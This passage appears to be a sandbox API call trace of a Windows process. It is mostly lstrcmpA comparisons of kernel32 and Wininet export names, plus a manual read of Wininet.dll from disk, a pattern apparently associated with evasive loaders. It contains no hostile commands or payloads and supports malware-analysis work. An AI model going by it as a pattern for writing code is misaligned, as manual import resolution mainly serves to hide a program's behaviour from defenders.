lpString2="AddAtomA") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0243.445] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0243.445] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0243.446] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0243.446] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtxWorker") returned 1 [0243.447] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddResourceAttributeAce") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddScopedPolicyIDAce") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddSecureMemoryCacheCallback") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredContinueHandler") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddVectoredExceptionHandler") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AdjustCalendarDate") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocConsole") returned -1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPages") returned 1 [0243.448] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AllocateUserPhysicalPagesNuma") returned 0 [0244.713] GetProcessHeap () returned 0x4e0000 [0244.713] HeapFree (in: hHeap=0x4e0000, dwFlags=0x0, lpMem=0x50c5f0 | out: hHeap=0x4e0000) returned 1 [0244.713] GetProcessHeap () returned 0x4e0000 [0244.713] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x10) returned 0x4f9180 [0244.713] LoadLibraryA (lpLibFileName="Wininet.dll") returned 0x7ffc51070000 [0244.725] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0244.725] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0244.725] GetModuleFileNameA (in: hModule=0x7ffc51070000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")) returned 0x1f [0244.726] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0244.726] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0244.727] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0244.727] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=2647552) returned 1 [0244.727] GetProcessHeap () returned 0x4e0000 [0244.727] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x286600) returned 0x40ec040 [0244.733] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0244.734] ReadFile (in: hFile=0x140, lpBuffer=0x40ec040, nNumberOfBytesToRead=0x286600, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x40ec040*, lpNumberOfBytesRead=0x14f5a4*=0x286600, lpOverlapped=0x0) returned 1 [0245.049] CloseHandle (hObject=0x140) returned 1 [0245.049] lstrcmpA (lpString1="AppCacheCheckManifest", lpString2="AppCacheCheckManifest") returned 0 [0245.049] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCheckManifest") returned 1 [0245.049] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0245.049] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0245.049] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0245.049] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0245.050] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0245.050] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0245.050] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0245.050] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0245.051] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0245.172] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0245.172] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0245.173] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0245.174] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0245.175] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.175] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0245.176] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0245.177] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 